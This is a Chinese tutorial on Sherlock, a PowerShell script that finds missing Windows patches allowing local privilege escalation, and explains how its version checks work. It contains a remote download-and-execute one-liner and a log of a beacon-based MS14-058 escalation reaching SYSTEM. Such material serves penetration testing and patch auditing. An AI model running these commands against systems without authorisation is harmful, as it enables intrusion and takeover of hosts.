针对漏洞检测神器Sherlock的深度分析与使用教程

针对漏洞检测神器Sherlock的深度分析与使用教程。

0×01 Sherlock简介

Sherlock是一个在Windows下用于本地提权的PowerShell脚本。

目前包含了以下漏洞:

MS10-015 : User Mode to Ring (KiTrap0D)

MS10-092 : Task Scheduler

MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow

MS13-081 : TrackPopupMenuEx Win32k NULL Page

MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference

MS15-051 : ClientCopyImage Win32k

MS15-078 : Font Driver Buffer Overflow

MS16-016 : ‘mrxdav.sys’ WebDAV

MS16-032 : Secondary Logon Handle

0×02 初步使用

本地加载脚本

Import-Module Sherlock.ps1

远程加载脚本

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

发现漏洞:

PS C:UsersAdministrator> Find-AllVulns

Title : User Mode to Ring (KiTrap0D)

MSBulletin : MS10-015

CVEID : 2010-0232

Link : https://www.exploit-db.com/exploits/11199/

VulnStatus : Not supported on 64-bit systems

Title : Task Scheduler .XML

MSBulletin : MS10-092

CVEID : 2010-3338, 2010-3888

Link : https://www.exploit-db.com/exploits/19930/

VulnStatus : Not Vulnerable

Title : NTUserMessageCall Win32k Kernel Pool Overflow

MSBulletin : MS13-053

CVEID : 2013-1300

Link : https://www.exploit-db.com/exploits/33213/

VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenuEx Win32k NULL Page

MSBulletin : MS13-081

CVEID : 2013-3881

Link : https://www.exploit-db.com/exploits/31576/

VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenu Win32k Null Pointer Dereference

MSBulletin : MS14-058

CVEID : 2014-4113

Link : https://www.exploit-db.com/exploits/35101/

VulnStatus : Appears Vulnerable

Title : ClientCopyImage Win32k

MSBulletin : MS15-051

CVEID : 2015-1701, 2015-2433

Link : https://www.exploit-db.com/exploits/37367/

VulnStatus : Appears Vulnerable

Title : Font Driver Buffer Overflow

MSBulletin : MS15-078

CVEID : 2015-2426, 2015-2433

Link : https://www.exploit-db.com/exploits/38222/

VulnStatus : Not Vulnerable

Title : 'mrxdav.sys' WebDAV

MSBulletin : MS16-016

CVEID : 2016-0051

Link : https://www.exploit-db.com/exploits/40085/

VulnStatus : Not supported on 64-bit systems

Title : Secondary Logon Handle

MSBulletin : MS16-032

CVEID : 2016-0099

Link : https://www.exploit-db.com/exploits/39719/

VulnStatus : Appears Vulnerable

Appears Vulnerable就是存在漏洞

验证:

PS C:UsersAdministrator> elevate ms14-058 smb

[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)

[+] host called home, sent: 105015 bytes

[+] received output:

[*] Getting Windows version...

[*] Solving symbols...

[*] Requesting Kernel loaded modules...

[*] pZwQuerySystemInformation required length 51216

[*] Parsing SYSTEM_INFO...

[*] 173 Kernel modules found

[*] Checking module SystemRootsystem32ntoskrnl.exe

[*] Good! nt found as ntoskrnl.exe at 0x0264f000

[*] ntoskrnl.exe loaded in userspace at: 40000000

[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC

[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0

[*] Registering class...

[*] Creating window...

[*] Allocating null page...

[*] Getting PtiCurrent...

[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0

[*] Creating a fake structure at NULL...

[*] Triggering vulnerability...

[!] Executing payload...

[+] host called home, sent: 204885 bytes

[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105

beacon> getuid

[*] Tasked beacon to get userid

[+] host called home, sent: 8 bytes

[*] You are NT AUTHORITYSYSTEM (admin)

可以发现提权成功,注意Sherlock只是验证,并不能帮助你直接进行利用。

0×03 隐藏的小技巧

除了上述的基本功能外,脚本里面还隐藏了一些作者没有介绍到的小功能

获取软件版本

Sherlock还可以让我们来获取软件的版本号,我们只需要运行Get-FileVersionInfo命令即可。

演示:

获取CPU架构

运行Get-Architecture命令,我们就可以知道CPU的架构是32位还是64位的。

演示:

0×04 Sherlock漏洞验证原理分析

Sherlock除了作者已经加入的那些漏洞,我们还可以自己来加入感兴趣的漏洞。再添加漏洞之前,我们先来分析一下Sherlock漏洞验证的原理。

在Sherlock中,每一个漏洞验证模块都是一个function,具体形式如下:

function Find-MS16032 {

}

然后使用Get-Architecture来获取系统版本,判断系统版本是否存在提权漏洞。符合再进行下一步判断。

if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" )

然后通过Get-FileVersionInfo获取存在漏洞的文件的版本信息,主要提取后面两段数字。

然后就简单了,用一个switch+if对比版本就行了:

switch ( $Build ) {

7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }

7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }

9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }

9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }

10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }

10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }

default { $VulnStatus = "Not Vulnerable" }

}

然后我们自己添加漏洞就简单了,在function New-ExploitTable中加入漏洞信息。

测试一下,我们先来创建一个function Find-MS16135:

function Find-MS16135 {

$MSBulletin = "MS16-135"

$VulnStatus = "Appears Vulnerable"

Set-ExploitTable $MSBulletin $VulnStatus

}

然后在function Find-AllVulns中加入Find-MS16135就OK啦。

测试看看:

0×05 总结

整个框架总体思路就是这样咯,接下来就看小伙伴们来查找存在漏洞的文件版本了,目前我还没好的思路可以快速去寻找存在漏洞的文件版本,不知道大家有没有好的思路求分享啊。

项目地址:https://github.com/rasta-mouse/Sherlock